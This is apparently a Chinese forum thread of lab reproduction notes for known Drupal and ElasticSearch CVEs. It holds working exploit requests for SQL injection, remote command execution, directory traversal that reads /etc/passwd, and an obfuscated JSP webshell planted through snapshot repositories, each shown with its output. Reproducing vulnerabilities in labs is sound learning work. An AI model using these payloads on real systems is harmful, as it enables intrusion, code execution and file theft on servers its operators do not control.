User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 120

pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a

```

传送后得到如下信息（报错信息）：

```
Warning: mb_strlen() expects parameter 1 to be string, array given in drupal_strlen() (line 478 of /var/www/html/includes/unicode.inc).
Warning: addcslashes() expects parameter 1 to be string, array given in DatabaseConnection->escapeLike() (line 984 of /var/www/html/includes/database/database.inc).
PDOException: SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ' root@172.18.0.3': SELECT * FROM {users} WHERE name = :name_0 or updatexml(0,concat(0xa,user()),0)#, :name_0 AND status = 1; Array ( [:name_0 or updatexml(0,concat(0xa,user()),0)#] => bob [:name_0] => a ) in user_login_authenticate_validate() (line 2149 of /var/www/html/modules/user/user.module).
```

![image-20211030203505002](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030203505002.png)

## ***Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞（CVE-2017-6920）

这个环境的安装好麻烦，下次再写。。。。

## Drupal Drupalgeddon 2 远程代码执行漏洞（CVE-2018-7600）

打开后是这样的：

![image-20211030204851973](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030204851973.png)

直接抓包，将数据包内容修改如下：

```
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: 127.0.0.1:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 103

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id

```

将数据包发送到repeater模块中，点击send，在response中得到如下信息：

![img](

!large)

## Drupal 远程代码执行漏洞（CVE-2018-7602）

Drupal 应用会处理`path?destination=URL`形式的请求，发起请求需要对`destination=URL`中的URL进行URL编码，当对URL中的`#`进行编码两次，就可以绕过`sanitize()`函数过滤。

构造特殊请求绕过过滤代码

```text
POST /drupal-7.59/drupal-7.59/node/9/delete?destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami
```

其中`%2523`是对`#`的两次URL编码。

WEB中间件对`%2523`解码获得`%23`

![img](

)

绕过`sanitize()`,`stripDangrousValues`函数检查。

在Drupal应用对`destination URL`进行处理时，会再次解码`%23`,获得`#`。

![img](

)

使用parse_str,并存入options，还需要通过其他步骤来触发漏洞。

![img](

)

## ElasticSearch 命令执行漏洞（CVE-2014-3120）测试环境

打开后是这样的：

```
{
  "status" : 200,
  "name" : "Straw Man",
  "version" : {
"number" : "1.1.1",
"build_hash" : "f1585f096d3f3985e73456debdc1a0745f512bbc",
"build_timestamp" : "2014-04-16T14:27:12Z",
"build_snapshot" : false,
"lucene_version" : "4.7"
  },
  "tagline" : "You Know, for Search"
}

```

![image-20211030212713995](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030212713995.png)

MVEL 执行命令的代码如下：

```
import java.io.*;
new java.util.Scanner(Runtime.getRuntime().exec("id").getInputStream()).useDelimiter("\\A").next();
```

将 Java 代码放入 json 中：

```
{
"size": 1,
"query": {
   "filtered": {
      "query": {
      "match_all": {
      }
      }
   }
},
"script_fields": {
      "command": {
         "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"
      }
}
  }
```

首先，该漏洞需要 es 中至少存在一条数据，所以我们需要先创建一条数据，所以将数据包中的内容修改如下：

```
POST /website/blog/ HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

{
  "name": "phithon"
}
```

结果如下：

```
{
  "status" : 200,
  "name" : "Straw Man",
  "version" : {
"number" : "1.1.1",
"build_hash" : "f1585f096d3f3985e73456debdc1a0745f512bbc",
"build_timestamp" : "2014-04-16T14:27:12Z",
"build_snapshot" : false,
"lucene_version" : "4.7"
  },
  "tagline" : "You Know, for Search"
}

```

![image-20211030213257681](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030213257681.png)

然后，执行任意代码，抓包后将数据包中的内容修改如下：

```
POST /_search?pretty HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 343

{
"size": 1,
"query": {
   "filtered": {
      "query": {
      "match_all": {
      }
      }
   }
},
"script_fields": {
      "command": {
         "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"
      }
}
}
```

![image-20211030213604829](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211030213604829.png)

结果如图：

```
{
  "took" : 241,
  "timed_out" : false,
  "_shards" : {
"total" : 5,
"successful" : 5,
"failed" : 0
  },
  "hits" : {
"total" : 2,
"max_score" : 1.0,
"hits" : [ {
   "_index" : "website",
   "_type" : "blog",
   "_id" : "MjQNrzvsQeK5F0gBQbyCfQ",
   "_score" : 1.0,
   "fields" : {
      "command" : [ "uid=0(root) gid=0(root) groups=0(root)\n" ]
   }
} ]
  }
}

```

sandalwood · 发表于 2021-10-31 22:26:24

## ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞（CVE-2015-1427）测试环境

### 原理

ElasticSearch 支持使用 “在沙盒中的” Groovy 语言作为动态脚本，但显然官方的工作并没有做好。lupin 和 tang3 分别提出了两种执行命令的方法：

> 既然对执行 Java 代码有沙盒，lupin 的方法是想办法绕过沙盒，比如使用 Java 反射
> Groovy 原本也是一门语言，于是 tang3 另辟蹊径，使用 Groovy 语言支持的方法，来直接执行命令，无需使用 Java 语言

所以，根据这两种执行漏洞的思路，我们可以获得两个不同的 POC。

Java 沙盒绕过法：

```
java.lang.Math.class.forName("java.lang.Runtime").getRuntime().exec("id").getText()
```

Goovy 直接执行命令法：

```
def command='id';def res=command.execute().text;res
```

### 复现

打开后是这样的（访问IP地址：9200）：

```
{
  "status" : 200,
  "name" : "Cyclops",
  "cluster_name" : "elasticsearch",
  "version" : {
"number" : "1.4.2",
"build_hash" : "927caff6f05403e936c20bf4529f144f0c89fd8c",
"build_timestamp" : "2014-12-16T14:11:12Z",
"build_snapshot" : false,
"lucene_version" : "4.10.2"
  },
  "tagline" : "You Know, for Search"
}
```

![image-20211031094854311](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211031094854311.png)

由于查询时至少要求 es 中有一条数据，所以发送如下数据包，增加一个数据：

```
POST /website/blog/ HTTP/1.1
Host: 127.0.0.1:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

{
  "name": "test"
}
```

![image-20211031095450377](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211031095450377.png)

得到如下结果：

```
{"_index":"website","_type":"blog","_id":"AXzUDsNy0zGz1Fo_rTP2","_version":1,"created":true}
```

![image-20211031095519095](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211031095519095.png)

然后发送包含 payload 的数据包，执行任意命令：

```
POST /_search?pretty HTTP/1.1
Host: 127.0.0.1:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/text
Content-Length: 156

{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}

```

![image-20211031095636055](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211031095636055.png)

点击forward：

```
{
  "took" : 5213,
  "timed_out" : false,
  "_shards" : {
"total" : 5,
"successful" : 5,
"failed" : 0
  },
  "hits" : {
"total" : 1,
"max_score" : 1.0,
"hits" : [ {
   "_index" : "website",
   "_type" : "blog",
   "_id" : "AXzUDsNy0zGz1Fo_rTP2",
   "_score" : 1.0,
   "fields" : {
      "lupin" : [ "uid=0(root) gid=0(root) groups=0(root)\n" ]
   }
} ]
  }
}
```

![image-20211031095703452](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211031095703452.png)

##

sandalwood · 发表于 2021-11-5 22:06:35

心态崩了，电脑出问题了，之前写的没了。。。。
还好发过了，后面长长记性，一个复现写一个文档。。。。

# ElasticSearch 目录穿越漏洞（CVE-2015-5531）

打开后是这样的：

```
{
  "status" : 200,
  "name" : "Persuader",
  "cluster_name" : "elasticsearch",
  "version" : {
"number" : "1.6.0",
"build_hash" : "cdd3ac4dde4f69524ec0a14de3828cb95bbb86d0",
"build_timestamp" : "2015-06-09T13:36:34Z",
"build_snapshot" : false,
"lucene_version" : "4.10.4"
  },
  "tagline" : "You Know, for Search"
}

```

![image-20211105195347376](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211105195347376.png)

直接用burpsuite抓包，并将数据包修改为如下内容：

## 新建一个仓库

```
PUT /_snapshot/test HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 108

{
"type": "fs",
"settings": {
      "location": "/usr/share/elasticsearch/repo/test"
}
}

```

![image-20211105195053508](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211105195053508.png)

点击forward后得到如下内容：

![image-20211105195557411](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211105195557411.png)

![image-20211105195546077](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211105195546077.png)

## 创建一个快照

继续用burpsuite抓包，并将数据包修改为如下内容：

```
PUT /_snapshot/test2 HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 108

{
"type": "fs",
"settings": {
      "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata"
}
}

```

![image-20211105200110949](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211105200110949.png)

点击forward后得到如下内容：

```
{"acknowledged":true}
```

![image-20211105200233821](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211105200233821.png)

## 目录穿越读取任意文件

访问

`http://your-ip:9200/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd`

并抓包，发送到repeater模块中

得到如下内容：

```
HTTP/1.1 400 Bad Request

Content-Type: application/json; charset=UTF-8

Content-Length: 4305

{"error":"ElasticsearchParseException[Failed to derive xcontent from (offset=0, length=919): [114, 111, 111, 116, 58, 120, 58, 48, 58, 48, 58, 114, 111, 111, 116, 58, 47, 114, 111, 111, 116, 58, 47, 98, 105, 110, 47, 98, 97, 115, 104, 10, 100, 97, 101, 109, 111, 110, 58, 120, 58, 49, 58, 49, 58, 100, 97, 101, 109, 111, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 98, 105, 110, 58, 120, 58, 50, 58, 50, 58, 98, 105, 110, 58, 47, 98, 105, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 115, 121, 115, 58, 120, 58, 51, 58, 51, 58, 115, 121, 115, 58, 47, 100, 101, 118, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 115, 121, 110, 99, 58, 120, 58, 52, 58, 54, 53, 53, 51, 52, 58, 115, 121, 110, 99, 58, 47, 98, 105, 110, 58, 47, 98, 105, 110, 47, 115, 121, 110, 99, 10, 103, 97, 109, 101, 115, 58, 120, 58, 53, 58, 54, 48, 58, 103, 97, 109, 101, 115, 58, 47, 117, 115, 114, 47, 103, 97, 109, 101, 115, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 109, 97, 110, 58, 120, 58, 54, 58, 49, 50, 58, 109, 97, 110, 58, 47, 118, 97, 114, 47, 99, 97, 99, 104, 101, 47, 109, 97, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 108, 112, 58, 120, 58, 55, 58, 55, 58, 108, 112, 58, 47, 118, 97, 114, 47, 115, 112, 111, 111, 108, 47, 108, 112, 100, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 109, 97, 105, 108, 58, 120, 58, 56, 58, 56, 58, 109, 97, 105, 108, 58, 47, 118, 97, 114, 47, 109, 97, 105, 108, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 110, 101, 119, 115, 58, 120, 58, 57, 58, 57, 58, 110, 101, 119, 115, 58, 47, 118, 97, 114, 47, 115, 112, 111, 111, 108, 47, 110, 101, 119, 115, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 117, 117, 99, 112, 58, 120, 58, 49, 48, 58, 49, 48, 58, 117, 117, 99, 112, 58, 47, 118, 97, 114, 47, 115, 112, 111, 111, 108, 47, 117, 117, 99, 112, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 112, 114, 111, 120, 121, 58, 120, 58, 49, 51, 58, 49, 51, 58, 112, 114, 111, 120, 121, 58, 47, 98, 105, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 119, 119, 119, 45, 100, 97, 116, 97, 58, 120, 58, 51, 51, 58, 51, 51, 58, 119, 119, 119, 45, 100, 97, 116, 97, 58, 47, 118, 97, 114, 47, 119, 119, 119, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 98, 97, 99, 107, 117, 112, 58, 120, 58, 51, 52, 58, 51, 52, 58, 98, 97, 99, 107, 117, 112, 58, 47, 118, 97, 114, 47, 98, 97, 99, 107, 117, 112, 115, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 108, 105, 115, 116, 58, 120, 58, 51, 56, 58, 51, 56, 58, 77, 97, 105, 108, 105, 110, 103, 32, 76, 105, 115, 116, 32, 77, 97, 110, 97, 103, 101, 114, 58, 47, 118, 97, 114, 47, 108, 105, 115, 116, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 105, 114, 99, 58, 120, 58, 51, 57, 58, 51, 57, 58, 105, 114, 99, 100, 58, 47, 118, 97, 114, 47, 114, 117, 110, 47, 105, 114, 99, 100, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 103, 110, 97, 116, 115, 58, 120, 58, 52, 49, 58, 52, 49, 58, 71, 110, 97, 116, 115, 32, 66, 117, 103, 45, 82, 101, 112, 111, 114, 116, 105, 110, 103, 32, 83, 121, 115, 116, 101, 109, 32, 40, 97, 100, 109, 105, 110, 41, 58, 47, 118, 97, 114, 47, 108, 105, 98, 47, 103, 110, 97, 116, 115, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 110, 111, 98, 111, 100, 121, 58, 120, 58, 54, 53, 53, 51, 52, 58, 54, 53, 53, 51, 52, 58, 110, 111, 98, 111, 100, 121, 58, 47, 110, 111, 110, 101, 120, 105, 115, 116, 101, 110, 116, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 95, 97, 112, 116, 58, 120, 58, 49, 48, 48, 58, 54, 53, 53, 51, 52, 58, 58, 47, 110, 111, 110, 101, 120, 105, 115, 116, 101, 110, 116, 58, 47, 98, 105, 110, 47, 102, 97, 108, 115, 101, 10]]","status":400}
```

![image-20211105200710110](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211105200710110.png)

用浏览器中的检查中的控制台来进行ASCII转码：

![image-20211105202229940](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211105202229940.png)

```
String.fromCharCode(114, 111, 111, 116, 58, 120, 58, 48, 58, 48, 58, 114, 111, 111, 116, 58, 47, 114, 111, 111, 116, 58, 47, 98, 105, 110, 47, 98, 97, 115, 104, 10, 100, 97, 101, 109, 111, 110, 58, 120, 58, 49, 58, 49, 58, 100, 97, 101, 109, 111, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 98, 105, 110, 58, 120, 58, 50, 58, 50, 58, 98, 105, 110, 58, 47, 98, 105, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 115, 121, 115, 58, 120, 58, 51, 58, 51, 58, 115, 121, 115, 58, 47, 100, 101, 118, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 115, 121, 110, 99, 58, 120, 58, 52, 58, 54, 53, 53, 51, 52, 58, 115, 121, 110, 99, 58, 47, 98, 105, 110, 58, 47, 98, 105, 110, 47, 115, 121, 110, 99, 10, 103, 97, 109, 101, 115, 58, 120, 58, 53, 58, 54, 48, 58, 103, 97, 109, 101, 115, 58, 47, 117, 115, 114, 47, 103, 97, 109, 101, 115, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 109, 97, 110, 58, 120, 58, 54, 58, 49, 50, 58, 109, 97, 110, 58, 47, 118, 97, 114, 47, 99, 97, 99, 104, 101, 47, 109, 97, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 108, 112, 58, 120, 58, 55, 58, 55, 58, 108, 112, 58, 47, 118, 97, 114, 47, 115, 112, 111, 111, 108, 47, 108, 112, 100, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 109, 97, 105, 108, 58, 120, 58, 56, 58, 56, 58, 109, 97, 105, 108, 58, 47, 118, 97, 114, 47, 109, 97, 105, 108, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 110, 101, 119, 115, 58, 120, 58, 57, 58, 57, 58, 110, 101, 119, 115, 58, 47, 118, 97, 114, 47, 115, 112, 111, 111, 108, 47, 110, 101, 119, 115, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 117, 117, 99, 112, 58, 120, 58, 49, 48, 58, 49, 48, 58, 117, 117, 99, 112, 58, 47, 118, 97, 114, 47, 115, 112, 111, 111, 108, 47, 117, 117, 99, 112, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 112, 114, 111, 120, 121, 58, 120, 58, 49, 51, 58, 49, 51, 58, 112, 114, 111, 120, 121, 58, 47, 98, 105, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 119, 119, 119, 45, 100, 97, 116, 97, 58, 120, 58, 51, 51, 58, 51, 51, 58, 119, 119, 119, 45, 100, 97, 116, 97, 58, 47, 118, 97, 114, 47, 119, 119, 119, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 98, 97, 99, 107, 117, 112, 58, 120, 58, 51, 52, 58, 51, 52, 58, 98, 97, 99, 107, 117, 112, 58, 47, 118, 97, 114, 47, 98, 97, 99, 107, 117, 112, 115, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 108, 105, 115, 116, 58, 120, 58, 51, 56, 58, 51, 56, 58, 77, 97, 105, 108, 105, 110, 103, 32, 76, 105, 115, 116, 32, 77, 97, 110, 97, 103, 101, 114, 58, 47, 118, 97, 114, 47, 108, 105, 115, 116, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 105, 114, 99, 58, 120, 58, 51, 57, 58, 51, 57, 58, 105, 114, 99, 100, 58, 47, 118, 97, 114, 47, 114, 117, 110, 47, 105, 114, 99, 100, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 103, 110, 97, 116, 115, 58, 120, 58, 52, 49, 58, 52, 49, 58, 71, 110, 97, 116, 115, 32, 66, 117, 103, 45, 82, 101, 112, 111, 114, 116, 105, 110, 103, 32, 83, 121, 115, 116, 101, 109, 32, 40, 97, 100, 109, 105, 110, 41, 58, 47, 118, 97, 114, 47, 108, 105, 98, 47, 103, 110, 97, 116, 115, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 110, 111, 98, 111, 100, 121, 58, 120, 58, 54, 53, 53, 51, 52, 58, 54, 53, 53, 51, 52, 58, 110, 111, 98, 111, 100, 121, 58, 47, 110, 111, 110, 101, 120, 105, 115, 116, 101, 110, 116, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 95, 97, 112, 116, 58, 120, 58, 49, 48, 48, 58, 54, 53, 53, 51, 52, 58, 58, 47, 110, 111, 110, 101, 120, 105, 115, 116, 101, 110, 116, 58, 47, 98, 105, 110, 47, 102, 97, 108, 115, 101, 10)
"root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
```

# Elasticsearch写入webshell漏洞（WooYun-2015-110216）

## 原理

ElasticSearch 具有备份数据的功能，用户可以传入一个路径，让其将数据备份到该路径下，且文件名和后缀都可控。

所以，如果同文件系统下还跑着其他服务，如 Tomcat、PHP 等，我们可以利用 ElasticSearch 的备份功能写入一个 webshell。

和 CVE-2015-5531 类似，该漏洞和备份仓库有关。在 elasticsearch1.5.1 以后，其将备份仓库的根路径限制在配置文件的配置项 path.repo 中，而且如果管理员不配置该选项，则默认不能使用该功能。即使管理员配置了该选项，web 路径如果不在该目录下，也无法写入 webshell。所以该漏洞影响的 ElasticSearch 版本是 1.5.x 以前。

## 复现过程

本测试环境同时运行了 Tomcat 和 ElasticSearch，Tomcat 目录在 /usr/local/tomcat，web 目录是 /usr/local/tomcat/webapps；ElasticSearch 目录在 /usr/share/elasticsearch。

我们的目标就是利用 ElasticSearch，在 /usr/local/tomcat/webapps 目录下写入我们的 webshell。

### 首先创建一个恶意索引文档

```
curl -XPOST http://127.0.0.1:9200/yz.jsp/yz.jsp/1 -d'
{"<%new java.io.RandomAccessFile(application.getRealPath(new String(new byte[]{47,116,101,115,116,46,106,115,112})),new String(new byte[]{114,119})).write(request.getParameter(new String(new byte[]{102})).getBytes());%>":"test"}
'
```

得到如下信息：

```
{"_index":"yz.jsp","_type":"yz.jsp","_id":"1","_version":1,"created":true}
```

### 再创建一个恶意的存储库

其中 `location` 的值即为我要写入的路径。

> 这个 Repositories 的路径比较有意思，因为他可以写到可以访问到的任意地方，并且如果这个路径不存在的话会自动创建。那也就是说你可以通过文件访问协议创建任意的文件夹。这里我把这个路径指向到了 tomcat 的 web 部署目录，因为只要在这个文件夹创建目录 Tomcat 就会自动创建一个新的应用 (文件名为 wwwroot 的话创建出来的应用名称就是 wwwroot 了)。

```
curl -XPUT 'http://127.0.0.1:9200/_snapshot/yz.jsp' -d '{
   "type": "fs",
   "settings": {
      "location": "/usr/local/tomcat/webapps/wwwroot/",
      "compress": false
   }
}'
```

得到如下信息：

```
{"acknowledged":true}
```

![image-20211105203658007](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211105203658007.png)

### 存储库验证并创建

```
curl -XPUT "http://127.0.0.1:9200/_snapshot/yz.jsp/yz.jsp" -d '{
   "indices": "yz.jsp",
   "ignore_unavailable": "true",
   "include_global_state": false
}'
```

得到如下信息：

```
{"accepted":true}
```

访问地址：

http://127.0.0.1:8080/wwwroot/indices/yz.jsp/snapshot-yz.jsp，这就是我们写入的 webshell。

> 该 shell 的作用是向 wwwroot 下的 test.jsp 文件中写入任意字符串

访问后得到如下信息：

```
<!doctype html><html lang="en"><head><title>HTTP Status 500 – Internal Server Error</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 500 – Internal Server Error</h1><hr class="line" /><p><b>Type</b> Exception Report</p><p><b>Message</b> An exception occurred processing JSP page [/indices/yz.jsp/snapshot-yz.jsp] at line [1]</p><p><b>Description</b> The server encountered an unexpected condition that prevented it from fulfilling the request.</p><p><b>Exception</b></p><pre>org.apache.jasper.JasperException: An exception occurred processing JSP page [/indices/yz.jsp/snapshot-yz.jsp] at line [1]

1: {"yz.jsp":{"version":2,"state":"open","settings":{"index.number_of_shards":"5","index.number_of_replicas":"1","index.version.created":"1050199","index.creation_date":"1636115699186","index.uuid":"oaxUg-8OT2-GCq0rUJ1eQg"},"mappings":[{"yz.jsp":{"properties":{"<%new java.io.RandomAccessFile(application.getRealPath(new String(new byte[]{47,116,101,115,116,46,106,115,112})),new String(new byte[]{114,119})).write(request.getParameter(new String(new byte[]{102})).getBytes());%>":{"type":"string"}}}}],"aliases":{}}}

Stacktrace:
org.apache.jasper.servlet.JspServletWrapper.handleJspException(JspServletWrapper.java:598)
org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:495)
org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:386)
org.apache.jasper.servlet.JspServlet.service(JspServlet.java:330)
javax.servlet.http.HttpServlet.service(HttpServlet.java:742)
org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
</pre><p><b>Root Cause</b></p><pre>java.lang.NullPointerException
org.apache.jsp.indices.yz_jsp.snapshot_002dyz_jsp._jspService(snapshot_002dyz_jsp.java:110)
org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
javax.servlet.http.HttpServlet.service(HttpServlet.java:742)
org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:457)
org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:386)
org.apache.jasper.servlet.JspServlet.service(JspServlet.java:330)
javax.servlet.http.HttpServlet.service(HttpServlet.java:742)
org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
</pre><p><b>Note</b> The full stack trace of the root cause is available in the server logs.</p><hr class="line" /><h3>Apache Tomcat/8.5.33</h3></body></html>
```

![image-20211105205303546](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211105205303546.png)

然后访问地址：

```
http://127.0.0.1:8080/wwwroot/in ... ot-yz.jsp?f=success
```

得到如下信息：

```
{"yz.jsp":{"version":2,"state":"open","settings":{"index.number_of_shards":"5","index.number_of_replicas":"1","index.version.created":"1050199","index.creation_date":"1636115699186","index.uuid":"oaxUg-8OT2-GCq0rUJ1eQg"},"mappings":[{"yz.jsp":{"properties":{"":{"type":"string"}}}}],"aliases":{}}}
```

最后访问地址：

```
http://127.0.0.1:8080 /wwwroot/test.jsp
```

